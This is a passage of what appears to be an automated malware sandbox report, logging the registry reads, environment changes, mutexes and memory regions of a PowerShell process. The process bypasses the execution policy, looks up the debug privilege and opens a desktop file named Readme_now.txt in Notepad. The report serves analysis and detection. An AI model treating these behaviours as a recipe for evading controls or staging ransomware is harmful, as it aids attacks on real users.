| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time\Dynamic DST | value_name = LastEntry, data = 2008, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time\Dynamic DST | value_name = 2007, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time\Dynamic DST | value_name = 2008, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time | value_name = MUI_Display, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time | value_name = MUI_Display, data = @tzres.dll,-670, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time | value_name = MUI_Std, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time | value_name = MUI_Std, data = @tzres.dll,-672, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time | value_name = MUI_Dlt, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time | value_name = MUI_Dlt, data = @tzres.dll,-671, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
84 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
5 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
5 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
4 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
3 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
3 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
3 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
3 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
3 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
3 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
3 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
3 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
3 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Readme_now.txt | show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Windows\system32\en-US\tzres.dll.mui | base_address = 0x88a0001 |
|
3 | |
| Get Filename | - | process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
2 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (1542)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 0 milliseconds (0.000 seconds) |
|
1301 | |
| Sleep | duration = 5 milliseconds (0.005 seconds) |
|
1 | |
| Sleep | duration = -1 (infinite) |
|
1 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
3 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
118 | |
| Get Info | type = Hardware Information |
|
118 |
Mutex (10)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-1462094071-1423818996-289466292-1000 |
|
1 | |
| Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-1462094071-1423818996-289466292-1000 |
|
1 | |
| Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-1462094071-1423818996-289466292-1000 |
|
1 | |
| Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-1462094071-1423818996-289466292-1000 |
|
1 | |
| Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-1462094071-1423818996-289466292-1000 |
|
1 | |
| Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-1462094071-1423818996-289466292-1000 |
|
1 | |
| Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-1462094071-1423818996-289466292-1000 |
|
1 | |
| Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-1462094071-1423818996-289466292-1000 |
|
1 | |
| Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-1462094071-1423818996-289466292-1000 |
|
1 | |
| Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-1462094071-1423818996-289466292-1000 |
|
1 |
Environment (1499)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
33 | |
| Get Environment String | name = PSModulePath, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = PinnableBufferCache_System.Threading.OverlappedData_Disabled |
|
1 | |
| Get Environment String | name = PinnableBufferCache_System.Threading.OverlappedData_MinCount |
|
1 | |
| Get Environment String | name = PathEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = USERPROFILE, result_out = C:\Users\CIiHmnxMn6Ps |
|
2 | |
| Get Environment String | name = PSModuleAutoLoadingPreference |
|
1427 | |
| Get Environment String | name = PSExecutionPolicyPreference, result_out = Bypass |
|
2 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
7 | |
| Get Environment String | name = PSDisableModuleAutoloadingCacheMaintenance |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
3 | |
| Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
10 | |
| Set Environment String | name = PSExecutionPolicyPreference, value = Bypass |
|
1 | |
| Set Environment String | name = PathEXT, value = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL |
|
1 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
Process #8: notepad.exe
0
0
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\syswow64\notepad.exe |
| Command Line | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\CIiHmnxMn6Ps\Desktop\Readme_now.txt |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:21, Reason: Child Process |
| Unmonitor | End Time: 00:04:50, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:29 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf58 |
| Parent PID | 0x51c (c:\windows\syswow64\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FC0
0x
F00
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| notepad.exe | 0x00220000 | 0x00257fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000800000 | 0x00800000 | 0x047fffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004800000 | 0x04800000 | 0x0481ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004800000 | 0x04800000 | 0x0480ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004810000 | 0x04810000 | 0x04813fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004820000 | 0x04820000 | 0x04821fff | Private Memory | rw |
|
|
|
- |
| notepad.exe.mui | 0x04820000 | 0x04822fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004830000 | 0x04830000 | 0x04843fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004850000 | 0x04850000 | 0x0488ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004890000 | 0x04890000 | 0x048cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000048d0000 | 0x048d0000 | 0x048d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000048e0000 | 0x048e0000 | 0x048e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000048f0000 | 0x048f0000 | 0x048f1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04900000 | 0x049bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000049c0000 | 0x049c0000 | 0x049fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a00000 | 0x04a00000 | 0x04a00fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a10000 | 0x04a10000 | 0x04a10fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a20000 | 0x04a20000 | 0x04a2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a30000 | 0x04a30000 | 0x04a6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a70000 | 0x04a70000 | 0x04b6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b70000 | 0x04b70000 | 0x04cf7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004d00000 | 0x04d00000 | 0x04d0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004d10000 | 0x04d10000 | 0x04e90fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004ea0000 | 0x04ea0000 | 0x0629ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000062a0000 | 0x062a0000 | 0x062a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000062b0000 | 0x062b0000 | 0x062b1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000062c0000 | 0x062c0000 | 0x06377fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000063d0000 | 0x063d0000 | 0x063dffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| winspool.drv | 0x6edb0000 | 0x6ee16fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x6f250000 | 0x6f458fff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x74370000 | 0x7438afff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74610000 | 0x7462cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74630000 | 0x746a4fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x770d0000 | 0x77161fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ecd0000 | 0x7ecd0000 | 0x7edcffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007edd0000 | 0x7edd0000 | 0x7edf2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007edf4000 | 0x7edf4000 | 0x7edf6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edf7000 | 0x7edf7000 | 0x7edf9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edfa000 | 0x7edfa000 | 0x7edfafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edfd000 | 0x7edfd000 | 0x7edfdfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
